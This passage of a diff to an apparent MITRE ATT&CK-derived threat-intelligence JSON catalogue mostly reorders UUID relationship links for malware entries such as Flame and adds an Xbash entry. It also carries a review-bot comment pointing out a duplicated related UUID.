"dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -13088,13 +14992,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ 
@@ -13103,14 +15000,7 @@ "type": "uses" }, { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13123,6 +15013,13 @@ ], "type": "uses" }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", "tags": [ @@ -13130,20 +15027,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -13152,7 +15035,7 @@ "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -13166,7 +15049,42 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
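Review bot: The `dest-uuid` `56fca983-1cf1-4fd1-bda0-5e170a37ab59` added in this hunk also survives as an unchanged context line in the hunk at -13012,+14916, so on the new side it appears twice in what looks like the same `related` array (the hunks from -12954 to -13192 seem to belong to one entry, though an entry boundary could sit in an unshown stretch). The old side carried the same duplicate, since the copy removed in the -13130 hunk was its second occurrence, so this is inherited rather than introduced, but consumers that build graphs from `related` will still get a duplicated edge. Deduplicating by `dest-uuid` and `type` when the list is assembled (in the export script, if there is one) would fix this for every entry. The entry's `related` array begins and ends outside this hunk.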
@@ -13192,62 +15110,6 @@ ] }, "related": [ - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ 
@@ -13262,12 +15124,68 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", @@ -13304,14 +15222,14 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -13351,27 +15269,6 @@ ], "type": "uses" }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ @@ -13380,14 +15277,14 @@ "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13408,21 +15305,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -13436,7 +15326,35 @@ "type": "uses" }, { - "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -13470,6 +15388,62 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ 
@@ -13484,55 +15458,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ @@ -13540,20 +15465,6 @@ ], "type": "uses" }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ 
@@ -13562,28 +15473,14 @@ "type": "uses" }, { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13597,14 +15494,42 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -13616,13 +15541,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "e9595678-d269-469e-ae6b-75e49259de63", @@ -13700,6 +15618,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "36675cd3-fe00-454c-8516-aebecacbe9d9", "tags": [ @@ -13708,7 +15633,7 @@ "type": "uses" }, { - "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13727,13 +15652,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "f36b2598-515f-4345-84e5-5ccde253edbe", @@ -13774,20 +15692,6 @@ ], "type": "uses" }, - { - "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -13796,7 +15700,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -13810,42 +15714,7 @@ "type": "uses" }, { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13859,7 +15728,14 @@ "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -13872,6 +15748,41 @@ ], "type": "uses" }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ @@ -13879,6 +15790,27 @@ ], "type": "uses" }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ 
@@ -13893,26 +15825,19 @@ ], "type": "uses" }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "a5528622-3a8a-4633-86ce-8cdaf8423858", @@ -13949,7 +15874,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13963,14 +15888,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14018,14 +15943,14 @@ "type": "uses" }, { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -14059,14 +15984,7 @@ "type": "uses" }, { - "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14080,7 +15998,14 @@ "type": "uses" }, { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14129,14 +16054,7 @@ "type": "uses" }, { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14150,7 +16068,14 @@ "type": "uses" }, { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -14195,14 +16120,21 @@ "type": "uses" }, { - "dest-uuid": "51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "dest-uuid": "52d40641-c480-4ad5-81a3-c80ccaddf82d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14215,20 +16147,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "52d40641-c480-4ad5-81a3-c80ccaddf82d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ 
@@ -14236,23 +16154,302 @@ ], "type": "uses" }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + } + ], + "uuid": "ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "value": "Flame - S0143" + }, + { + "description": "[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)", + "meta": { + "external_id": "S0341", + "mitre_platforms": [ + "Windows", + "Linux" + ], + "refs": [ + "https://attack.mitre.org/software/S0341", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" + ], + "synonyms": [ + "Xbash" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" }, { - "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + 
"tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" } ], - "uuid": "ff6840c9-4c87-4d07-bbb6-9f50aa33d498", - "value": "Flame - S0143" + "uuid": "6a92d80f-cc65-45f6-aa66-3cdea6786b3c", + "value": "Xbash - S0341" + }, + { + "description": "[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)", + 